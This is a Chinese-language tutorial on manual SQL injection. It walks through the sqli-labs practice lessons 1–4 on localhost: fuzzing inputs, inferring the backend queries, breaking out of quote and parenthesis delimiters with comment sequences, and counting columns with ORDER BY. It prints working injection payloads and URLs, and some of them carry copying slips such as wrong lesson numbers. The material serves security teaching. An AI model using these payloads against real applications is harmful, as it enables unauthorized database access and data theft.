手动SQL注入基础详解

原文地地址：http://www.nxadmin.com/web/1025.html

　　Sql Injection漏洞一直是在owasp排名第一的漏洞类型，有时候注入漏洞很难通过工具检测到.本文将详细介绍一下Sql Injection的各种类型,通过利用测试的环境，让大家对Sql Injection漏洞有比较多的了解.

什么是sql injection漏洞?

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗数据库服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等。

Sql Injection的类型

Sql注入根据数据提取通道的类型，从服务器接收到的响应等可以分为不同的类型.

 

基于从服务器接收到的响应 

• 基于错误的SQL注入
  • 联合查询的类型。
  • 双击查询注射。

• SQL盲注
  • 基于布尔SQL盲注。
  • 基于时间的SQL盲注。

基于错误的SQL注入主要是SQL Server转储一些错误给用户,通过应用程序的这个错误来进行利用的注入类型.下图中黄色部分显示的是错误。后面将详细的进行介绍。

盲注漏洞是指在注射语句之后无法在前端看到后端数据库服务器的反应等，因此”盲”说明了一个事实，只能通过一些计算的假设进行尝试注入.

基于如何处理输入的SQL查询（数据类型） 

• 基于字符串
• 数字或整数为基础的

根据后端SQL查询如何处理输入的参数的不同，可以将SQL注入分为字符串注入或整数为基础的注入。

基于程度和顺序的注入(哪里发生了影响)

• 一阶注射
• 二阶注射

一阶注射是指输入的注射语句对WEB直接产生了影响，出现了结果；二阶注入类似存储型XSS，是指输入提交的语句，无法直接对WEB应用程序产生影响，通过其它的辅助间接的对WEB产生危害，这样的就被称为是二阶注入.
基于注入点的位置上的 

• 通过用户输入的表单域的注射。
• 通过cookie注射。
• 通过服务器变量注射。 （基于头部信息的注射）

为什么会发生SQL注入？ 

一般来说，一个应用程序与后端数据库会在底层数据库驱动的帮助下，以查询的形式进行交互。 该驱动程序是依赖于正在使用的应用平台和后端数据库的类型，如MYSQL，MSSQL，DB2，ORACLE。

一个通用的登录查询会大概是这样：

`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’$variable1′ AND password=’$variable2′;`

我们可以把这个查询分为两部分，代码段和数据段。 数据部分为$variable1 和 $variable2和用来定义字符串的边界的引号。

来演示一个实例，假设 在登录表单输入的正确用户名是admin，密码为p@ssw0rd,在后端数据库查询语句就会是如下：

`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’admin′ AND password=’p@ssword′;`

因为是正确的帐号和密码,这样就可以成功的登录，如果用户恶意输入一些特殊意义的字符串，有可能会引发DB驱动程序的报错，比如在输入用户名为

admin’，SQL查询语句将会变为：

`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’admin’′ AND password=’p@ssword′;`

为什么会这样呢？因为用户的恶意输入打破了web应用程序的逻辑.

总结：当一个攻击者能够逃避数据的边界，他可以附加数据，产生可解释的SQL查询，在后端数据库执行之后，从而造成注入。

基于错误的SQL注入 

在一般情况下，所有的编程语言为开发人员为了灵活的调试和修复他们的应用程序，通过使用一些内置的错误处理函数/库,来提供了友好的错误消息，以便可以简化故障排除时间等。

通过输入特殊意义的字符串，根据错误信息的提示，来获取一些有用信息以及敏感数据的过程被列为基于错误的SQL注入。

基于错误的注射，可分为两种主要类型：

• 联合查询类型
• 双击查询类型

接下来详细讨论SQL注入的过程.

这里我们搭建好了测试用的环境，测试的主要逻辑方法有一下几点：

• 枚举应用程序的行为
• 用伪造数据模糊测试导致应用程序产生报错
• 通过猜测在后端使用的SQL查询，尽量控制注入点。
• 从后端数据库中提取数据

理论已经足够了，下面开始行动

枚举： 

测试页面less1-less4基本上是相同的，当我们打开less1页面，要求我们输入一个ID值作为get参数.

图

ID为数值，我们看到了一个特定的用户名和密码出现在屏幕上，ID的值是1到8之间。 对于任何其他的数值，屏幕上不会有结果显示.
id=15 => 页面上没有结果显示

id=14=>页面上没有结果显示

ID=1 => Login name= Dumb, Password=Dumb

ID=2 => Login name= Angelina, Password=I-kill-you

ID=3 => Login name= Dummy, Password=p@ssw0rd

ID=4 => Login name= secure, Password=crappy

ID=5 => Login name= stupid, Password=stupidity

ID=6 => Login name= superman, Password=genious

ID=7 => Login name= batman, Password=mob!le

ID=8 => Login name= admin, Password=admin

ID=15 => 页面上没有结果显示

ID=20 =>页面上没有结果显示

ID=100 => 页面上没有结果显示

结果枚举：数据库表中似乎有8条记录，任何不存在的ID值，它返回一个空集。

模糊测试： 

一般来说，应用程序开发人员假定用户将输入整数值。 尝试用模糊测试所有的应用程序输入点。 那么究竟什么是模糊？ 这是一个过程，输入一些特殊意义的参数等，并尝试找到应用程序报错的差异反应。差异的报错表明可能存在漏洞。

以下是一些任意的输入：

• “ 
  
• “ 
  
• \ 
  
• ; 
  
• ％00 
  
• ） 
  
• （ 
  
• aaa 
  

整数或字符串测试：由于输入参数似乎是整数值，让我们尝试输入ID参数的字符串值，并观察其行为。

Less1: http://localhost/sqli-labs/Less-1/?id=asdf

Less2: http://localhost/sqli-labs/Less-2/?id=asdf

Less3: http://localhost/sqli-labs/Less-3/?id=asdf

Less4: http://localhost/sqli-labs/Less-4/?id=asdf

 

整数和字符串测试的结果：我们看到，Less1、Less3、Less4返回的页面是空的，没有任何结果和报错，而Less2返回不同的，有一个MySQL错误消息。 从非常基本的编程技术，我们知道一个字符串参数始终包裹在单引号或双引号中，而整数不是这样。 因此，我们可以假设，Less1、Less3和Less4使用某种形式的引号包裹用户输入。他们认为输入的字符串值在数据库中不存在的，因此返回空值。Less2产生了一个错误提示，这意味着用户输入没有被引号包裹，因此整数型的输入在查询中正常工作，但是输入字符串值确产生了报错。 综上，我们可以推断出， less1、less3、less4是基于字符串的注入，而less2是一个整数型的注入。

继续模糊化：现在，让我们进一步采取模糊的字符.

用单引号来进行测试

less1

http://localhost/sqli-labs/Less-1/?id=1‘

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1′ at line 1

less2

http://localhost/sqli-labs/Less-2/?id=1 ‘

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1′ at line 1

less3

http://localhost/sqli-labs/Less-3/?id=1 ‘

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1′ at line 1

所有这三个都产生错误提示，只有less4没有错误提示，反正正常的查询结果.

用双引号进行测试

用双引号测试发现只有less4会产生错误提示，less1、less2、less3都返回正常的结果。

通过上面的测试，less1、less2、less3是单引号注入，而less4是双引号注入.

 

综合所有的测试，less1、less3、less4是基于字符串的注入，而less2是基于数字的注入。

用\进行测试

“\”转义符在mysql中是为了打印具有特殊意义的字符串。测试结果如下：

less1

http://localhost/sqli-labs/Less-1/?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1\’ LIMIT 0,1′ at line 1

less2

http://localhost/sqli-labs/Less-2/?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\ LIMIT 0,1′ at line 1

less3

http://localhost/sqli-labs/Less-3/?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1\’) LIMIT 0,1′ at line 1

less4

http://localhost/sqli-labs/Less-4/?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”1\”) LIMIT 0,1′ at line 1

less1的报错，当我们输入1\的时候，报错信息中1\附近可以看到一个单引号，说明输入字符串是被单引号所包裹的。

less2的报错信息，当我们输入1\的时候，报错信息中没有返回引号，说明less2是一个整数类型的注入，不需要用引号来突破查询获取结果。

less3报错信息，当我们输入1\的时候，报错信息中1\后面出现了’),说明应用程序中的变量是在括号中的，如（‘var’).

less4的报错信息，当我们输入1\的时候，报错信息中1\后面出现了”),说明应用程序中的变量var是这样的,如(“var”).

这四种情况在后端查询中使用的语句实际分别为：

Less-1: SELECT * FROM TABLE_NAME WHERE ID=’$ID’ LIMIT 0,1

Less-2: SELECT * FROM TABLE_NAME WHERE ID=$ID LIMIT 0,1

Less-3: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1

Less-4: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1

 

对于一个成功的注入，应该关闭查询语句中围绕在变量周围的分隔符,从而使我们逃避字符串/整数的编辑，并且成功执行sql语句.有两种方法，一种是注释掉其余的查询语句，另外一种是增加额外的分隔符,多余的分隔符使查询语句在语法上是正确的，如：

Less-1: SELECT * FROM TABLE_NAME WHERE ID=’ $ID ‘ LIMIT 0,1

当我们输入的参数$ID的值为1‘,查询语句就会变成如下：

SELECT * FROM TABLE_NAME WHERE ID=’ 1′ ‘ LIMIT 0,1

现在这个查询语句是不正确的，我们需要解决多余的’号，这个’号是原始查询的一部分，可以用以下方法：

方法一：

可以使用sql注释来修复语法问题，mysql使用三种类型的注释:-+、#、/**/ 。因此我们可以使用1′-+或者1’#

查询语句将变为如下：

SELECT * FROM TABLE_NAME WHERE ID=’ 1′–+ ‘ LIMIT 0,1

SELECT * FROM TABLE_NAME WHERE ID=’ 1′ # ‘ LIMIT 0,1

注射的完整URL如下：

http://localhost/sqli-labs/Less-1/?id=1′–+

http://localhost/sqli-labs/Less-1/?id=1′ %23
(%23是#号的url编码)

在less2中，因为没有额外的引号，所以只需要注释掉后面的语句就可以了，查询语句和完整的sql注射URL如下:

http://localhost/sqli-labs/Less-2/?id=1–+

http://localhost/sqli-labs/Less-2/?id=1 %23

SELECT * FROM TABLE_NAME WHERE ID= 1–+ LIMIT 0,1

SELECT * FROM TABLE_NAME WHERE ID= 1# LIMIT 0,1

在less3中，我们推断后端sql语句如下：

SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1

所以我们需要想办法先关闭掉分隔符，然后再注释掉后面的语句

SELECT * FROM TABLE_NAME WHERE ID=(‘ 1′) –+ ‘) LIMIT 0,1

SELECT * FROM TABLE_NAME WHERE ID=(‘ 1′) # ‘) LIMIT 0,1

注射： 1′) –+       1′) #

完整的注射URL:

http://localhost/sqli-labs/Less-2/?id=1‘)-+

http://localhost/sqli-labs/Less-2/?id=1′) %23

在less4中，我们推广后端sql语句如下：

SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1

同样，需要关闭掉分隔符，然后注释掉后面的语句

SELECT * FROM TABLE_NAME WHERE ID=(” 1″) –+ “) LIMIT 0,1

SELECT * FROM TABLE_NAME WHERE ID=(” 1″) # “) LIMIT 0,1

注射： 1″) –+       1″) #

http://localhost/sqli-labs/Less-2/?id=1″)–+

http://localhost/sqli-labs/Less-2/?id=1 “)%23

通过查询了解表中的字段数

正如我们看到的，在枚举阶段，应用程序与数据库进行交互，并在网页上显示一些信息，这个过程经常会用到union语句联合查询数据库中的信息。使用union语句的一个限制是两个表或者多个表中的字段必须数量一致,因此需要用order by语句来判断字段数量。当只有N个字段时，如果你order by N+1或更大，就报错了。

下面我们测试用order by 1,order by 2……等来查询观察结果.

http://localhost/sqli-labs/Less-1/?id=1′ order by 1-+ 返回正常页面

http://localhost/sqli-labs/Less-1/?id=1′ order by 4-+返回错误页面，说明表中只有3列.

Lesson2:

Injection: 1 ORDER BY 1 –+ => 没有错误.

Injection: 1 ORDER BY 2–+ => 没有错误.

Injection: 1 ORDER BY 3 –+ => 没有错误.

Injection: 1 ORDER BY 4 –+ => 错误 – 可以确定表中只有三列.

当我们知道了表中的字段数，我们就可以继续下一步查询相关的字段名或者字段值了。